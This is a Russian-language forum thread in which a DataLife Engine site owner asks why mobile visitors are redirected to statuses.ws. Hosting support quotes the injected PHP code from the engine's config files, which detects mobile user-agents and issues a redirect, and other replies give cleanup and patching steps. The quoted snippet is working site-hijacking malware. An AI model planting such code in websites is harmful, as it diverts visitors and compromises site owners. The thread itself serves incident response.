pahanorlando 3 Опубликовано: 16 января 2013 Рассказать Опубликовано: 16 января 2013 Привет, короче последние пару недель когда я захожу на свои сайты с телефона, открывается statuses.ws и livecounter.ws, спросил в тех поддержке на сервере и там обнаружиле эти когда, подскажите что происходит и что надо делать, спасибо Уважаемый Pavel! Есть строки вида - engine/data/config.php:274: header('Location: http://statuses.ws/'); engine/data/config.php:283: header('Location: http://statuses.ws/'); engine/data/dbconfig.php:26: header('Location: http://statuses.ws/'); engine/data/dbconfig.php:35: header('Location: http://statuses.ws/'); Владелц у этих файлов www-data, дата изменения Янв 12 19:25. Запустить сканирование сервера антивирусом? C уважением, специалист службы поддержки FastVPS LLC Мамонов Сергей Дорогой Pavel! Как вижу дописан сторонний код вида - $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry === true) { header('Location: http://statuses.ws/'); } $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry === true) { header('Location: http://statuses.ws/'); } C уважением, специалист службы поддержки FastVPS LLC Мамонов Сергей Сайт http://www.bestpcreviews.comупс, поздно заметил что проблема такая была у других, т.е. если я обновлю движок до последнее версии (естественно он идёт с обновленным патчем теперь) то всё должно работать? А откуда надо будет убрать потом эти кода? Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 16 января 2013 Рассказать Опубликовано: 16 января 2013 (изменено) delete Изменено 16 января 2013 пользователем ower_xz Цитата Ссылка на сообщение Поделиться на других сайтах
dampel 0 Опубликовано: 16 января 2013 Рассказать Опубликовано: 16 января 2013 Отсюда нужно будет убрать engine/data/config.php engine/data/dbconfig.php Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 16 января 2013 Рассказать Опубликовано: 16 января 2013 pahanorlando, происходит по причине отсутствия патчей безопасности http://dle-news.ru/bags/ Что делать: 1. Восстановите все файлы на сервере на оригинальные из архива дистрибутива. 2. Установите все патчи безопасности повторно после этого http://dle-news.ru/bags/ 3. В админпанели запустите антивирус и удалите все на что он укажет. 4. Проверьте файлы в папке engine/data/ на наличие посторонних кодов. 5. Удалите все посторонние модули и скрипты с сервера если таковые имеются 6. Смените все пароли в том числе к БД и по FTP. Если после этого вирус не пропадет, пишите нам, предоставляйте доступ по FTP и к админпанели скрипта, будем осматривать ваш сервер. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.